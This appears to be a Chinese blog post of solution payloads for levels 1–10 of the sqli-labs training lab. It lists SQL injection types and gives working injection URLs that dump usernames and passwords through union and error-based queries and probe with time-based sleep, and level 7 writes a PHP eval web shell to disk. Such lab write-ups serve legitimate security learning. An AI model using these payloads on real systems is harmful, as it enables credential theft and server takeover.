sqli-labs
SQL注入分类:
- 可以联合查询的注入
- 报错注入
- 通过注入进行DNS请求,从而达到回显的目的
- Bool盲注
- 时间盲注
Less-1:
http://localhost/sqli-labs-kali2-master/Less-1/?id=-1%27+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+
Less-2:
http://localhost/sqli-labs-kali2-master/Less-2/?id=-1+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+
Less-3:
http://localhost/sqli-labs-kali2-master/Less-3/?id=-1%27)+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+
Less-4:
http://localhost/sqli-labs-kali2-master/Less-4/?id=-1%22)+union+select+1,group_concat(username),group_concat(password)+from+security.users+--+
Less-5:
http://localhost/sqli-labs-kali2-master/Less-5/?id=1%27+union+select+updatexml(1,concat(0x7e,(substr((SELECT+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1)+--+
Less-6:
http://localhost/sqli-labs-kali2-master/Less-6/?id=1"+union+select+updatexml(1,concat(0x7e,(substr((SELECT+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1)+--+
Less-7:
http://localhost/sqli-labs-kali2-master/Less-7/?id=1%27))%20union%20select%201,%27%3C?php%20eval($_REQUEST[23]);%20?%3E%27,3%20into%20outfile%20%22/var/lib/mysql/1.php%22+--+
Less-8:
bool盲注
http://localhost/sqli-labs-kali2-master/Less-8/?id=1' and if(substr(database(),1,1)='S',sleep(5),sleep(1))+--+
Less-9:
http://localhost/sqli-labs-kali2-master/Less-9/?id=1' and if(substr(database(),1,1)='S',sleep(5),sleep(1))+--+
Less-10:
http://localhost/sqli-labs-kali2-master/Less-10/?id=1" and if(substr(database(),1,1)='S',sleep(5),sleep(1))+--+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
